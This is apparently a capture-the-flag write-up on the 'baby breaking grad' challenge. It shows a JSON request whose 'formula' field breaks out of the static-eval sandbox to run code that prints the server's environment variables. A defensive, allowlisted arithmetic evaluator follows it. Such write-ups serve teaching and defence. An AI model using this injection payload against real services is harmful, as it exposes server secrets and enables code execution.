OWASP Top 10 - baby breaking grad

MD5 hash: bf3dc912cf2d4f81b4d9591184baea98 = secured

Let’s see the source code:

formula = student.formula || '[0.20 * assignment + 0.25 * exam + 0.25 * paper]';

If we enter nothing, we get the error we saw above in the code:

We need the names Baker or Purvis, otherwise it won’t work:

https://javascript.info/json
Now let’s enter the values exam, paper and assignment.
With a bit of time I’ve passed the exam.

{"name":"Baked Peanut",
"exam":25,
"paper":25,
"assignment":20
}


If you score above 10.5, you pass the exam:

But, there is something else, the formula:

I can’t do anything, let’s read the code slowly again.
There is something with static-eval:
This one is not working.

{"name":"Kenny Baked",
"exam":25,
"paper":25,
"assignment":20,
"formula":"(function({x}){return x.constructor})({x:``.sub})(`console.log(process.env)`)()"
}
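
The "formula" field in the request above reaches the evaluator because the formula is read from the submitted student object. As an added example (not the challenge's code and not part of the original write-up), here is a restricted evaluator that accepts only numbers, `+ - * /`, parentheses and the three grade fields, so property access, calls and template strings never parse. The names `evalFormula`, `tokenize` and `ALLOWED` are hypothetical, and the formula is assumed to be written without the square brackets of the default.

```javascript
// Added example, not the challenge's code; ALLOWED, tokenize and evalFormula are hypothetical names.
const ALLOWED = new Set(['assignment', 'exam', 'paper']);
// Tokens are numbers, allowlisted names and + - * / ( ) only; anything else is rejected.
function tokenize(src) {
  const re = /\s*(?:(\d+(?:\.\d+)?)|([A-Za-z_]\w*)|([-+*\/()]))\s*/y;
  const tokens = [];
  while (re.lastIndex < src.length) {
    const at = re.lastIndex;
    const m = re.exec(src); // sticky: must match exactly at the current offset
    if (!m) throw new Error(`illegal character near offset ${at}`);
    if (m[2] !== undefined && !ALLOWED.has(m[2])) throw new Error(`unknown name: ${m[2]}`);
    tokens.push(m[1] !== undefined ? { num: Number(m[1]) } : m[2] !== undefined ? { id: m[2] } : { op: m[3] });
  }
  return tokens;
}
// Recursive-descent arithmetic: the grammar has no property access, calls or strings.
function evalFormula(src, grades) {
  if (typeof src !== 'string' || src.length > 200) throw new Error('bad formula');
  const t = tokenize(src);
  let i = 0;
  function primary() {
    const tok = t[i++] || {};
    if ('num' in tok) return tok.num;
    if ('id' in tok) {
      const v = grades[tok.id]; // tok.id is one of the three allowlisted fields
      if (!Number.isFinite(v)) throw new Error(`bad grade: ${tok.id}`);
      return v;
    }
    if (tok.op === '(') {
      const v = sum();
      if (t[i++]?.op !== ')') throw new Error('missing )');
      return v;
    }
    throw new Error('unexpected token or end of formula');
  }
  function product() {
    let v = primary();
    while (t[i]?.op === '*' || t[i]?.op === '/') v = t[i++].op === '*' ? v * primary() : v / primary();
    return v;
  }
  function sum() {
    let v = product();
    while (t[i]?.op === '+' || t[i]?.op === '-') v = t[i++].op === '+' ? v + product() : v - product();
    return v;
  }
  const result = sum();
  if (i !== t.length || !Number.isFinite(result)) throw new Error('trailing tokens or non-finite result');
  return result;
}
```

With the grades used in the JSON above (exam 25, paper 25, assignment 20), `evalFormula('0.20 * assignment + 0.25 * exam + 0.25 * paper', grades)` returns 16.5, while any input containing a dot, a call or an unlisted name throws.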